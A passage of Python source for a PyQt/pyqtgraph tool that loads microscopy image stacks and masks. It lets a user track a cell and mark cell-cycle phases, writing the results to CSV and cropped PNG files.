Implement cursor slider and '+' and '-' buttons. Integer value
INPUT
- minimum: minimum value reachable by cursor.
- maximum: maximum value reachable by cursor.
- parent: ?
OUTPUT
QWidget that can take integer values between 'minimum' and 'maximum'
"""
class Slider(QWidget):
valueChangedX = pyqtSignal([int], ['QString'])
def __init__(self, minimum, maximum, parent=None):
super(Slider, self).__init__(parent=parent)
self.verticalLayout = QVBoxLayout(self)
self.label = QLabel(self)
sample_palette = QPalette()
sample_palette.setColor(QPalette.WindowText, Qt.white)
self.label.setPalette(sample_palette)
self.verticalLayout.addWidget(self.label)
self.horizontalLayout = QHBoxLayout()
spacerItem = QSpacerItem(0, 5, QSizePolicy.Expanding, QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem)
self.slider = QSlider(self)
self.slider.setOrientation(Qt.Horizontal)
self.horizontalLayout.addWidget(self.slider)
# + button
self.butPlus = QPushButton("+")
self.butPlus.clicked.connect(self.appui_bouton_plus)
self.horizontalLayout.addWidget(self.butPlus)
#- button
self.butMinus = QPushButton("-")
self.butMinus.clicked.connect(self.appui_bouton_minus)
self.horizontalLayout.addWidget(self.butMinus)
spacerItem3 = QSpacerItem(0, 5, QSizePolicy.Expanding, QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem3)
self.verticalLayout.addLayout(self.horizontalLayout)
self.resize(self.sizeHint())
self.minimum = minimum
self.maximum = maximum
self.slider.valueChanged.connect(self.setLabelValue)
self.x = None
self.setLabelValue(self.slider.value())
def setLabelValue(self, value):
self.x = self.minimum + int((float(value) / (self.slider.maximum() - self.slider.minimum())) * (
self.maximum - self.minimum))
self.valueChangedX.emit(self.x)
self.label.setText("{0:.4g}".format(self.x))
def appui_bouton_plus(self):
if self.x < self.maximum:
self.x += 1
self.valueChangedX.emit(self.x)
self.label.setText("{0:.4g}".format(self.x))
def appui_bouton_minus(self):
if self.x > self.minimum:
self.x -= 1
self.valueChangedX.emit(self.x)
self.label.setText("{0:.4g}".format(self.x))
"""
Slider class.
Implement cursor slider. Float value.
INPUT
- minimum: minimum value reachable by cursor.
- maximum: maximum value reachable by cursor.
- parent: ?
OUTPUT
QWidget that can take float values between 'minimum' and 'maximum'
"""
class Slider_thresh(QWidget):
valueChangedX = pyqtSignal([float], ['QString'])
def __init__(self, minimum, maximum, parent=None):
super(Slider_thresh, self).__init__(parent=parent)
self.verticalLayout = QVBoxLayout(self)
self.label = QLabel(self)
sample_palette = QPalette()
sample_palette.setColor(QPalette.WindowText, Qt.white)
self.label.setPalette(sample_palette)
self.verticalLayout.addWidget(self.label)
self.horizontalLayout = QHBoxLayout()
spacerItem = QSpacerItem(0, 20, QSizePolicy.Expanding, QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem)
self.slider = QSlider(self)
self.slider.setOrientation(Qt.Horizontal)
self.horizontalLayout.addWidget(self.slider)
spacerItem1 = QSpacerItem(0, 20, QSizePolicy.Expanding, QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem1)
self.verticalLayout.addLayout(self.horizontalLayout)
self.resize(self.sizeHint())
self.minimum = minimum
self.maximum = maximum
self.slider.valueChanged.connect(self.setLabelValue)
self.x = None
self.setLabelValue(0.5*(self.slider.maximum() - self.slider.minimum()))
# + button
self.butPlus = QPushButton("+")
self.butPlus.clicked.connect(self.appui_bouton_plus)
self.horizontalLayout.addWidget(self.butPlus)
#- button
self.butMinus = QPushButton("-")
self.butMinus.clicked.connect(self.appui_bouton_minus)
self.horizontalLayout.addWidget(self.butMinus)
spacerItem3 = QSpacerItem(0, 5, QSizePolicy.Expanding, QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem3)
def setLabelValue(self, value):
self.x = self.minimum + ((float(value) / (self.slider.maximum() - self.slider.minimum())) * (self.maximum - self.minimum))
self.valueChangedX.emit(self.x)
self.label.setText("thresh: {0:.4g}".format(self.x))
def appui_bouton_plus(self):
if self.x < self.maximum:
self.x += 0.1
self.valueChangedX.emit(self.x)
self.label.setText("{0:.4g}".format(self.x))
def appui_bouton_minus(self):
if self.x > self.minimum:
self.x -= 0.1
self.valueChangedX.emit(self.x)
self.label.setText("{0:.4g}".format(self.x))
"""
Implement buttons to manage interface.
The buttons made are:
- Quit: quit the application.
- Channel: load other image (other chanel), and save croped images in all channels.
- start and end tracking: start and end save crop of selected mask.
"""
class InterfaceManagerButton(QWidget):
isQuit = pyqtSignal()
isChannel = pyqtSignal()
isTrack = pyqtSignal()
isTrackEnd = pyqtSignal()
# iscomputeSpeed = pyqtSignal()
# iscomputeVolume = pyqtSignal()
# iscomputeStep = pyqtSignal()
def __init__(self, parent=None):
super(InterfaceManagerButton, self).__init__(parent=parent)
self.verticalLayout = QVBoxLayout(self)
self.horizontalLayout = QHBoxLayout()
self.butQuit = QPushButton("Quit")
self.butQuit.clicked.connect(self.quitImage)
self.horizontalLayout.addWidget(self.butQuit)
self.butChannel = QPushButton("Add channel")
self.butChannel.clicked.connect(self.channelImage)
self.horizontalLayout.addWidget(self.butChannel)
spacerItem = QSpacerItem(0, 0.5, QSizePolicy.Expanding, QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem)
self.verticalLayout.addLayout(self.horizontalLayout)
self.resize(self.sizeHint())
self.butTrack = QPushButton("Save crop")
self.butTrack.clicked.connect(self.trackImage)
self.horizontalLayout.addWidget(self.butTrack)
self.butTrackEnd = QPushButton("End save crop")
self.butTrackEnd.clicked.connect(self.trackEndImage)
self.horizontalLayout.addWidget(self.butTrackEnd)
# self.butcomputeSpeed = QPushButton("Maximum speed")
# self.butcomputeSpeed.clicked.connect(self.computeSpeed)
# self.horizontalLayout.addWidget(self.butcomputeSpeed)
# self.butcomputeVolume = QPushButton("Maximum volume increase")
# self.butcomputeVolume.clicked.connect(self.computeVolume)
# self.horizontalLayout.addWidget(self.butcomputeVolume)
# self.butcomputeStep = QPushButton("step")
# self.butcomputeStep.clicked.connect(self.computeStep)
# self.horizontalLayout.addWidget(self.butcomputeStep)
## click actions emitting signals
def quitImage(self):
print("Quit")
self.isQuit.emit()
def channelImage(self):
print("Adding new channel")
self.isChannel.emit()
def trackImage(self):
print("Start saving crop")
self.isTrack.emit()
def trackEndImage(self):
print("End saving crop")
self.isTrackEnd.emit()
# def computeSpeed(self):
# print("")
# self.iscomputeSpeed.emit()
# def computeVolume(self):
# print("")
# self.iscomputeVolume.emit()
# def computeStep(self):
# print("")
# self.iscomputeStep.emit()
"""
Implement bottom buttons.
The buttons made are:
- Shoot: use to start shooting procedure, i.e. following barycenter of mask into the ROI defined.
- Unshoot: refresh ROI selection.
- G1, eraly S, mid S, late S, G2, end tracking: use to defined phases of interest of the cell follow
by the shooting procedure.
"""
class BottomBut(QWidget):
isShooted = pyqtSignal()
isunShooted = pyqtSignal()
isG1 = pyqtSignal()
isEarlyS = pyqtSignal()
isMidS = pyqtSignal()
isLateS = pyqtSignal()
isG2 = pyqtSignal()
isEnd = pyqtSignal()
isloadMasks = pyqtSignal()
iscomputeMasks = pyqtSignal()
def __init__(self, parent=None):
super(BottomBut, self).__init__(parent=parent)
self.verticalLayout = QVBoxLayout(self)
self.horizontalLayout = QHBoxLayout()
self.butShoot = QPushButton("᪠ Shoot")
self.butShoot.clicked.connect(self.shoot)
self.horizontalLayout.addWidget(self.butShoot)
self.butunShoot = QPushButton("᳁ Un-Shoot")
self.butunShoot.clicked.connect(self.unshoot)
self.horizontalLayout.addWidget(self.butunShoot)
spacerItem = QSpacerItem(0, 0.5, QSizePolicy.Expanding, QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem)
self.butloadMasks = QPushButton("Load masks")
self.butloadMasks.clicked.connect(self.loadMasks)
self.horizontalLayout.addWidget(self.butloadMasks)
self.butcomputeMasks = QPushButton("Compute masks")
self.butcomputeMasks.clicked.connect(self.computeMasks)
self.horizontalLayout.addWidget(self.butcomputeMasks)
spacerItem = QSpacerItem(0, 1, QSizePolicy.Expanding, QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem)
self.butG1 = QPushButton("ᛰ G1")
self.butG1.clicked.connect(self.G1)
self.horizontalLayout.addWidget(self.butG1)
self.butEarlyS = QPushButton("ᛰ early S")
self.butEarlyS.clicked.connect(self.earlyS)
self.horizontalLayout.addWidget(self.butEarlyS)
self.butMidS = QPushButton("ᛰ mid S")
self.butMidS.clicked.connect(self.midS)
self.horizontalLayout.addWidget(self.butMidS)
self.butLateS = QPushButton("ᛰ late S")
self.butLateS.clicked.connect(self.lateS)
self.horizontalLayout.addWidget(self.butLateS)
self.butG2 = QPushButton("ᛰ G2")
self.butG2.clicked.connect(self.G2)
self.horizontalLayout.addWidget(self.butG2)
self.butEnd = QPushButton("ᛰ end Tracking")
self.butEnd.clicked.connect(self.ending)
self.horizontalLayout.addWidget(self.butEnd)
self.verticalLayout.addLayout(self.horizontalLayout)
self.resize(self.sizeHint())
## click actions emitting signals
def shoot(self):
print("shoot -- May take few seconds...")
self.isShooted.emit()
def unshoot(self):
print("unshoot")
self.isunShooted.emit()
def G1(self):
print("G1")
self.isG1.emit()
def earlyS(self):
print("Early S")
self.isEarlyS.emit()
def midS(self):
print("mid S")
self.isMidS.emit()
def lateS(self):
print("Late S")
self.isLateS.emit()
def G2(self):
print("G2")
self.isG2.emit()
def ending(self):
print('end')
self.isEnd.emit()
def loadMasks(self):
print("shoot")
self.isloadMasks.emit()
def computeMasks(self):
print("shoot")
self.iscomputeMasks.emit()
class Widget(QWidget):
def __init__(self, parent=None):
self.Shooted = False
super(Widget, self).__init__(parent=parent)
self.plot_mask = False
self.secondChannel = False
# Image selection
self.fold = QFileDialog.getOpenFileNames(self, "Select files containing images (tiff or png).",
os.path.join(os.getcwd(),'..','Data'),"*.png *.tiff *.tif")
dir_file = self.fold[0][0][:self.fold[0][0].rfind(os.sep)]
file_name = self.fold[0][0][self.fold[0][0].rfind(os.sep)+1:]
file_name = file_name[:-4]
# Check size of the data and format
if len(self.fold[0])!=0:
if self.fold[0][0].endswith('tiff') or self.fold[0][0].endswith('tif'):
TIFF = True
elif not(self.fold[0][0].endswith('png')):
TIFF = False
raise ValueError("Format not supported.")
else:
TIFF = False
else:
TIFF = False
raise ValueError("Error - no file found.")
# load images in shape (TIME,nx,ny)
if TIFF:
imgs = self.fold[0][0]
print("Warning: only one tiff can be process.")
tmp = np.array(imageio.mimread(imgs,memtest=False))
if tmp.dtype!='uint8':
tmp = bytescale(tmp)
self.im = np.squeeze(np.array(tmp,dtype=np.uint8))
self.im_nn = np.squeeze(np.array(tmp,dtype=type_im))
self.start = 0
self.finish = self.im.shape[0]-1
path_fold = self.fold[0][0]
else:
from skimage import color
pictList = self.fold[0]
path_fold = self.fold[0]
tmp = np.array(imageio.imread(pictList[0]))
if tmp.dtype!='uint8':
tmp = bytescale(tmp)
self.im = np.array(tmp,dtype=np.uint8)
self.im = np.zeros((len(pictList),self.im.shape[0],self.im.shape[1]))
self.im_nn = np.zeros((len(pictList),self.im.shape[1],self.im.shape[2]),dtype=type_im)
for i in range(len(pictList)):
tmp = color.rgb2gray(imageio.imread(pictList[i]))
self.im_nn[i] = np.array(tmp,dtype=type_im)
tmp = bytescale(tmp)
self.im[i] = np.array(tmp,dtype=np.uint8)
self.start = 0
self.finish = len(pictList)-1
self.im_original = self.im.copy()
self.nx = self.im[0].shape[0]
self.ny = self.im[0].shape[1]
self.data = self.im[0]
self.maskLoaded = False
# Set up environnement
self.Shooted = False
pal = QPalette()
pal.setColor(QPalette.Background, Qt.black)
self.setAutoFillBackground(True)
self.setPalette(pal)
self.horizontalLayout = QVBoxLayout(self)
self.w1 = Slider(self.start,self.finish)
self.horizontalLayout.addWidget(self.w1)
self.win = pg.GraphicsWindow(title="Basic plotting examples")
p1 = self.win.addPlot(row=1,col=1,rowspan=2)
self.horizontalLayout.addWidget(self.win)
self.w2 = BottomBut()
self.horizontalLayout.addWidget(self.w2)
self.progress = QProgressBar(self)
self.progress.setGeometry(0, 0, 300, 25)
self.progress.setMaximum(self.finish)
self.horizontalLayout.addWidget(self.progress)
self.speed=60
self.volume=0.5
self.step=20
def quitProcedure():
sys.exit()
"""
Load second channel from tif or png images.
If shape is not eqaul to the original image, and error is raised and the second channel is not loaded.
"""
def newChannelProcedure():
# Image selection
fold_ = QFileDialog.getOpenFileNames(self, "Select files containing other channel (tiff or png).",
os.path.join(os.getcwd(),'..','Data'),"*.png *.tiff *.tif")
# Check size of the data and format
if len(fold_[0])!=0:
if fold_[0][0].endswith('tiff') or fold_[0][0].endswith('tif'):
TIFF = True
elif not(fold_[0][0].endswith('png')):
TIFF = False
raise ValueError("Format not supported.")
else:
TIFF = False
else:
TIFF = False
raise ValueError("Error - no file found.")
if TIFF:
imgs = fold_[0][0]
print("Warning: only one tiff can be process.")
tmp = np.array(imageio.mimread(imgs,memtest=False))
from scipy.misc import bytescale
tmp = bytescale(tmp)
im_channel = np.squeeze(np.array(tmp,dtype=np.uint8))
else:
from skimage import color
pictList = fold_[0]
# path_fold = fold_[0]
tmp = np.array(imageio.imread(pictList[0]))
from scipy.misc import bytescale
tmp = bytescale(tmp)
im_channel = np.array(tmp,dtype=np.uint8)
im_channel = np.zeros((len(pictList),im_channel.shape[0],im_channel.shape[1]))
for i in range(len(pictList)):
tmp = bytescale(tmp)
im_channel[i] = np.array(tmp,dtype=np.uint8)
self.im_channel = im_channel.copy()
if self.im_channel.shape == self.im.shape:
self.secondChannel = True
else:
raise ValueError('Channel not with same shape as original images.')
def shootingProcedure():
if self.plot_mask and not(self.Shooted):
self.prev_shoot = -1
self.Shooted = True
self.shootID = uuid.uuid4().hex
self.frameStart = self.w1.x
initBB = np.array(self.boundingBox)
middle = np.array(np.mean(initBB,axis=0),dtype=int)
tmp = middle[0]
middle[0] = middle[1]
middle[1] = tmp
self.progress.show()
if self.secondChannel:
self.im, self.currentBar, self.mask_crop, self.im_focus, self.im_channel_focus, _ = extractMaskFromPoint(self.masks,self.im,self.im_channel,0,middle,self.finish,self.progress, minimalSize=minimalSize)
else:
self.im, self.currentBar, self.mask_crop, self.im_focus, _, _ = extractMaskFromPoint(self.masks,self.im,np.zeros(1),0,middle,self.finish,self.progress, minimalSize=minimalSize)
print('Shooting mode, identify phases.')
self.p3 = self.win.addPlot(row=2,col=2,rowspan=1)
self.img_crop = pg.ImageItem(None, border="w")
self.p3.addItem(self.img_crop)
self.win.show()
p1.setAspectLocked(ratioKept)
p1.autoRange()
self.img_crop.setImage(np.rot90(self.im_focus[self.w1.x],3))
self.p3.setAspectLocked(ratioKept)
self.p3.autoRange()
self.p3.setAspectLocked()
self.p3.autoRange()
updateImage()
elif not(self.plot_mask):
print('Error: load or compute mask first.')
return 0
elif self.Shooted:
print('Error: already in shooting procedure.')
return 0
def unShoot():
if self.plot_mask and self.Shooted:
self.Shooted = False
self.frameStart = None
self.currentBar = None
self.shootID = None
self.im = self.im_original.copy()
updateImage()
elif not(self.plot_mask):
print('Error: load or compute mask first.')
return 0
elif not(self.Shooted):
print('Error: already in unshooting procedure.')
return 0
"""
Writting into csv file.
The columns of the file are as follows:
- Code of the current shooting procedure, unique.
- Time where G1 begin.
- Position of barycenter of mask when G1 begin.
- Time where early S begin.
- Position of barycenter of mask when early S begin.
- Time where mid S begin.
- Position of barycenter of mask when mid S begin.
- Time where late S begin.
- Position of barycenter of mask when late S begin.
- Time where G2 begin.
- Position of barycenter of mask when G2 begin.
- Time where tracking end.
- Position of barycenter of mask when tracking ended.
"""
if not os.path.exists(os.path.join(dir_file,'Outputs',file_name)):
os.makedirs(os.path.join(dir_file,'Outputs',file_name))
def G1():
self.w2.butG1.setStyleSheet("background-color: red")
if not os.path.exists(os.path.join(dir_file,'Outputs',file_name,'cells.csv')):
f= open(os.path.join(dir_file,'Outputs',file_name,'cells.csv'),"w+")
else:
f= open(os.path.join(dir_file,'Outputs',file_name,'cells.csv'),"a+")
if self.Shooted:
f.write(str(self.shootID)+","+str(self.w1.x)+","+str(self.currentBar[self.w1.x])+", , , , , , , , , ,\n")
self.prev_shoot = self.w1.x
else:
print('Not in shooting mode.')
f.close()
def earlyS():
self.w2.butG1.setStyleSheet("background-color: white")
self.w2.butEarlyS.setStyleSheet("background-color: red")
if not os.path.exists(os.path.join(dir_file,'Outputs',file_name,'cells.csv')):
f= open(os.path.join(dir_file,'Outputs',file_name,'cells.csv'),"w+")
else:
f= open(os.path.join(dir_file,'Outputs',file_name,'cells.csv'),"a+")
if self.Shooted:
if self.prev_shoot==-1:
self.prev_shoot = self.w1.x
f.write(str(self.shootID)+", , ,"+str(self.w1.x)+","+str(self.currentBar[self.w1.x])+", , , , , , , ,\n")
# Save masks in same folder than images
if not os.path.exists(os.path.join(dir_file,'Outputs',file_name,'zoom',str(self.shootID))):
os.makedirs(os.path.join(dir_file,'Outputs',file_name,'zoom',str(self.shootID)))
if not os.path.exists(os.path.join(dir_file,'Outputs',file_name,'zoom_mask',str(self.shootID))):
os.makedirs(os.path.join(dir_file,'Outputs',file_name,'zoom_mask',str(self.shootID)))
for k in range(self.prev_shoot,self.w1.x+1):
tmp = np.array(self.im_focus[k]*self.mask_crop[k],dtype=np.float32)
if normalize:
tmp = np.array(np.iinfo(type_save).max*(tmp-tmp.min())/(tmp.max()-tmp.min()),dtype=type_save)
imageio.imsave(os.path.join(dir_file,'Outputs',file_name,'zoom',str(self.shootID),str(k).zfill(10)+'.png'),np.array(tmp,dtype=np.uint8))
tmp = np.array(self.mask_crop[k],dtype=np.float32)
tmp = np.array(np.iinfo(type_save).max*(tmp-tmp.min())/(tmp.max()-tmp.min()),dtype=type_save)
imageio.imsave(os.path.join(dir_file,'Outputs',file_name,'zoom_mask',str(self.shootID),str(k).zfill(10)+'.png'),np.array(tmp,dtype=np.uint8))
if self.secondChannel:
tmp = np.array(self.im_channel_focus[k],dtype=np.float32)
if normalize:
tmp = np.array(np.iinfo(type_save).max*(tmp-tmp.min())/(tmp.max()-tmp.min()),dtype=type_save)
imageio.imsave(os.path.join(dir_file,'Outputs',file_name,'zoom',str(self.shootID),'channel2_'+str(k).zfill(10)+'.png'),np.array(tmp,dtype=np.uint8))
self.prev_shoot = self.w1.x
else:
print('Not in shooting mode.')
f.close()
def midS():
self.w2.butEarlyS.setStyleSheet("background-color: white")
self.w2.butMidS.setStyleSheet("background-color: red")
if not os.path.exists(os.path.join(dir_file,'Outputs',file_name,'cells.csv')):
f= open(os.path.join(dir_file,'Outputs',file_name,'cells.csv'),"w+")
else:
f= open(os.path.join(dir_file,'Outputs',file_name,'cells.csv'),"a+")
if self.Shooted:
if self.prev_shoot==-1:
self.prev_shoot = self.w1.x
f.write(str(self.shootID)+", , , , ,"+str(self.w1.x)+","+str(self.currentBar[self.w1.x])+", , , , , ,\n")
# Save masks in same folder than images
if not os.path.exists(os.path.join(dir_file,'Outputs',file_name,'zoom',str(self.shootID))):
os.makedirs(os.path.join(dir_file,'Outputs',file_name,'zoom',str(self.shootID)))
if not os.path.exists(os.path.join(dir_file,'Outputs',file_name,'zoom_mask',str(self.shootID))):
os.makedirs(os.path.join(dir_file,'Outputs',file_name,'zoom_mask',str(self.shootID)))
for k in range(self.prev_shoot+1,self.w1.x+1):
tmp = np.array(self.im_focus[k]*self.mask_crop[k],dtype=np.float32)
if normalize:
tmp = np.array(np.iinfo(type_save).max*(tmp-tmp.min())/(tmp.max()-tmp.min()),dtype=type_save)
imageio.imsave(os.path.join(dir_file,'Outputs',file_name,'zoom',str(self.shootID),str(k).zfill(10)+'.png'),np.array(tmp,dtype=np.uint8))
tmp = np.array(self.mask_crop[k],dtype=np.float32)
tmp = np.array(np.iinfo(type_save).max*(tmp-tmp.min())/(tmp.max()-tmp.min()),dtype=type_save)
imageio.imsave(os.path.join(dir_file,'Outputs',file_name,'zoom_mask',str(self.shootID),str(k).zfill(10)+'.png'),np.array(tmp,dtype=np.uint8))
if self.secondChannel:
tmp = np.array(self.im_channel_focus[k],dtype=np.float32)
if normalize:
tmp = np.array(np.iinfo(type_save).max*(tmp-tmp.min())/(tmp.max()-tmp.min()),dtype=type_save)
imageio.imsave(os.path.join(dir_file,'Outputs',file_name,'zoom',str(self.shootID),'channel2_'+str(k).zfill(10)+'.png'),np.array(tmp,dtype=np.uint8))
self.prev_shoot = self.w1.x
else:
print('Not in shooting mode.')
f.close()
def lateS():
self.w2.butMidS.setStyleSheet("background-color: white")
self.w2.butLateS.setStyleSheet("background-color: red")
if not os.path.exists(os.path.join(dir_file,'Outputs',file_name,'cells.csv')):
f= open(os.path.join(dir_file,'Outputs',file_name,'cells.csv'),"w+")
else:
f= open(os.path.join(dir_file,'Outputs',file_name,'cells.csv'),"a+")
if self.Shooted:
if self.prev_shoot==-1:
self.prev_shoot = self.w1.x
f.write(str(self.shootID)+", , , , , , ,"+str(self.w1.x)+","+str(self.currentBar[self.w1.x])+", , , ,\n")
# Save masks in same folder than images
if not os.path.exists(os.path.join(dir_file,'Outputs',file_name,'zoom',str(self.shootID))):
os.makedirs(os.path.join(dir_file,'Outputs',file_name,'zoom',str(self.shootID)))
if not os.path.exists(os.path.join(dir_file,'Outputs',file_name,'zoom_mask',str(self.shootID))):
os.makedirs(os.path.join(dir_file,'Outputs',file_name,'zoom_mask',str(self.shootID)))
for k in range(self.prev_shoot+1,self.w1.x+1):
tmp = np.array(self.im_focus[k]*self.mask_crop[k],dtype=np.float32)
if normalize:
tmp = np.array(np.iinfo(type_save).max*(tmp-tmp.min())/(tmp.max()-tmp.min()),dtype=type_save)
imageio.imsave(os.path.join(dir_file,'Outputs',file_name,'zoom',str(self.shootID),str(k).zfill(10)+'.png'),np.array(tmp,dtype=np.uint8))
tmp = np.array(self.mask_crop[k],dtype=np.float32)
tmp = np.array(np.iinfo(type_save).max*(tmp-tmp.min())/(tmp.max()-tmp.min()),dtype=type_save)
imageio.imsave(os.path.join(dir_file,'Outputs',file_name,'zoom_mask',str(self.shootID),str(k).zfill(10)+'.png'),np.array(tmp,dtype=np.uint8))
if self.secondChannel:
tmp = np.array(self.im_channel_focus[k],dtype=np.float32)
if normalize:
tmp = np.array(np.iinfo(type_save).max*(tmp-tmp.min())/(tmp.max()-tmp.min()),dtype=type_save)
imageio.imsave(os.path.join(dir_file,'Outputs',file_name,'zoom',str(self.shootID),'channel2_'+str(k).zfill(10)+'.png'),np.array(tmp,dtype=np.uint8))
self.prev_shoot = self.w1.x
else:
print('Not in shooting mode.')
f.close()
def G2():
self.w2.butLateS.setStyleSheet("background-color: white")
self.w2.butG2.setStyleSheet("background-color: red")
if not os.path.exists(os.path.join(dir_file,'Outputs',file_name,'cells.csv')):
f= open(os.path.join(dir_file,'Outputs',file_name,'cells.csv'),"w+")
else:
f= open(os.path.join(dir_file,'Outputs',file_name,'cells.csv'),"a+")
if self.Shooted:
if self.prev_shoot==-1:
self.prev_shoot = self.w1.x
f.write(str(self.shootID)+", , , , , , , , ,"+str(self.w1.x)+","+str(self.currentBar[self.w1.x])+", ,\n")
# Save masks in same folder than images
if not os.path.exists(os.path.join(dir_file,'Outputs',file_name,'zoom',str(self.shootID))):
os.makedirs(os.path.join(dir_file,'Outputs',file_name,'zoom',str(self.shootID)))
if not os.path.exists(os.path.join(dir_file,'Outputs',file_name,'zoom_mask',str(self.shootID))):
os.makedirs(os.path.join(dir_file,'Outputs',file_name,'zoom_mask',str(self.shootID)))
for k in range(self.prev_shoot+1,self.w1.x+1):
tmp = np.array(self.im_focus[k]*self.mask_crop[k],dtype=np.float32)
if normalize:
tmp = np.array(np.iinfo(type_save).max*(tmp-tmp.min())/(tmp.max()-tmp.min()),dtype=type_save)
imageio.imsave(os.path.join(dir_file,'Outputs',file_name,'zoom',str(self.shootID),str(k).zfill(10)+'.png'),np.array(tmp,dtype=np.uint8))
tmp = np.array(self.mask_crop[k],dtype=np.float32)
tmp = np.array(np.iinfo(type_save).max*(tmp-tmp.min())/(tmp.max()-tmp.min()),dtype=type_save)
imageio.imsave(os.path.join(dir_file,'Outputs',file_name,'zoom_mask',str(self.shootID),str(k).zfill(10)+'.png'),np.array(tmp,dtype=np.uint8))
if self.secondChannel:
tmp = np.array(self.im_channel_focus[k],dtype=np.float32)
if normalize:
tmp = np.array(np.iinfo(type_save).max*(tmp-tmp.min())/(tmp.max()-tmp.min()),dtype=type_save)
imageio.imsave(os.path.join(dir_file,'Outputs',file_name,'zoom',str(self.shootID),'channel2_'+str(k).zfill(10)+'.png'),np.array(tmp,dtype=np.uint8))
self.prev_shoot = self.w1.x
else:
print('Not in shooting mode.')
f.close()
def end():
self.w2.butG2.setStyleSheet("background-color: white")
if not os.path.exists(os.path.join(dir_file,'Outputs',file_name,'cells.csv')):
f= open(os.path.join(dir_file,'Outputs',file_name,'cells.csv'),"w+")
else:
f= open(os.path.join(dir_file,'Outputs',file_name,'cells.csv'),"a+")
if self.Shooted:
if self.prev_shoot==-1:
self.prev_shoot = self.w1.x
f.write(str(self.shootID)+", , , , , , , , , , ,"+str(self.w1.x)+","+str(self.currentBar[self.w1.x])+"\n")
# Save masks in same folder than images
if not os.path.exists(os.path.join(dir_file,'Outputs',file_name,'zoom',str(self.shootID))):
os.makedirs(os.path.join(dir_file,'Outputs',file_name,'zoom',str(self.shootID)))
for k in range(self.prev_shoot+1,self.w1.x+1):
tmp = np.array(self.im_focus[k]*self.mask_crop[k],dtype=np.float32)
if normalize:
tmp = np.array(np.iinfo(type_save).max*(tmp-tmp.min())/(tmp.max()-tmp.min()),dtype=type_save)
imageio.imsave(os.path.join(dir_file,'Outputs',file_name,'zoom',str(self.shootID),str(k).zfill(10)+'.png'),np.array(tmp,dtype=np.uint8))
tmp = np.array(self.mask_crop[k],dtype=np.float32)
tmp = np.array(np.iinfo(type_save).max*(tmp-tmp.min())/(tmp.max()-tmp.min()),dtype=type_save)
imageio.imsave(os.path.join(dir_file,'Outputs',file_name,'zoom_mask',str(self.shootID),str(k).zfill(10)+'.png'),np.array(tmp,dtype=np.uint8))
if self.secondChannel:
tmp = np.array(self.im_channel_focus[k],dtype=np.float32)
if normalize:
tmp = np.array(np.iinfo(type_save).max*(tmp-tmp.min())/(tmp.max()-tmp.min()),dtype=type_save)
imageio.imsave(os.path.join(dir_file,'Outputs',file_name,'zoom',str(self.shootID),'channel2_'+str(k).zfill(10)+'.png'),np.array(tmp,dtype=np.uint8))
self.prev_shoot = self.w1.x
else:
print('Not in shooting mode.')
f.close()
# def Speed():
# self.speed = self.getInt('Maximum speed in one time step (in pixels)')
# def Volume():
# tmp = self.getInt('Maximum volume increase (in %)')
# self.volume = float(tmp)/100.
# def Step():
# self.step = self.getInt('Time between two detection of cells.')
"""
Load masks from tiff or png file. User should select a tiff image containing a time sequence of mask, or several png files refered as masks.
"""
def loadMasks():
loadsuccesfull = False
self.masks_path = QFileDialog.getOpenFileNames(self, "Select file(s) where masks are.",os.path.join(os.getcwd(),'..','Data'),
"*.png *.tiff *.tif")
if len(self.masks_path[0])!=0:
if self.masks_path[0][0].endswith('tiff') or self.masks_path[0][0].endswith('tif'):
TIFF_masks = True
elif not(self.masks_path[0][0].endswith('png')):
TIFF_masks = False
else:
TIFF_masks = False
loadsuccesfull = True
else:
TIFF_masks = False
print("Error - no file found.")
return False
# load images
if TIFF_masks:
masks_path = self.masks_path[0][0]
print("Warning: only one tiff can be process.")
mask = np.squeeze(np.array(imageio.mimread(masks_path,memtest=False),dtype=np.uint8))
else:
pictList = self.masks_path[0]
tmp = imageio.imread(pictList[0])
mask = np.array(bytescale(tmp),dtype=np.uint8)
mask = np.zeros((len(pictList),mask.shape[0],mask.shape[1]))
for i in range(len(pictList)):
tmp = imageio.imread(pictList[i])
mask[i] = np.array(bytescale(tmp),dtype=np.uint8)
self.masks_original = mask.copy()
self.masks = np.array(self.masks_original > 0,dtype=np.uint8)
if mask.shape[0] != self.finish+1:
print('Not same number of masks than images.')
loadsuccesfull = False
if loadsuccesfull:
if self.plot_mask != True:
self.plot_mask = True
self.p2 = self.win.addPlot(row=1,col=2,rowspan=1)
self.img_m = pg.ImageItem(None, border="w")
self.p2.addItem(self.img_m)
self.maskLoaded = True
self.win.show()
self.w1_m = Slider_thresh(0,1)
self.horizontalLayout.addWidget(self.w1_m)
p1.setAspectLocked(ratioKept)
p1.autoRange()
self.img_m.setImage(np.rot90(self.masks[self.w1.x],3))
self.p2.setAspectLocked(ratioKept)
self.p2.autoRange()
self.p2.setAspectLocked()
self.p2.autoRange()
self.w1_m.valueChangedX.connect(updateThresh)
updateThresh()
else:
self.img_m.setImage(np.rot90(self.masks[self.w1.x],3))
self.p2.setAspectLocked(ratioKept)
self.p2.autoRange()
self.p2.setAspectLocked()
self.p2.autoRange()
"""
Compute masks based on neural network model.
User should select 'h5' or 'hdf5' file.
Custom loss is implemented (binary cross entropy + dice coefficient). If any other custom loss
should be use, modify in the following function.
Images are put in [0,1] and then convert to the format needed by the neural network (usually uint16).
Masks are saved into 'Outputs' into the folder containing image
"""
def computeMasks():
from keras.models import load_model
from tensorflow.python.client import device_lib
from skimage.transform import resize
from keras import backend as K
from keras.losses import binary_crossentropy
import tensorflow as tf
import keras
MODE = "GPU" if "GPU" in [k.device_type for k in device_lib.list_local_devices()] else "CPU"
print(MODE)
print('########### Computing masks - please wait... ###########')
# def dice_coef_K(y_true, y_pred, smooth=1):
# y_true_f = K.flatten(y_true)
# y_pred_f = K.flatten(y_pred)
# intersection = K.sum(y_true_f * y_pred_f)
# return (2. * intersection + smooth) / (K.sum(y_true_f) + K.sum(y_pred_f) + smooth)
# def dice_coef_loss_K(y_true, y_pred):
# return 1-dice_coef_K(y_true, y_pred)
self.model = QFileDialog.getOpenFileName(self, "Select h5 file defining the AI model.",os.path.join(os.getcwd(),'Data','Segmentation','Model'),
"*.h5 *.hdf5")
if len(self.model[0])==0:
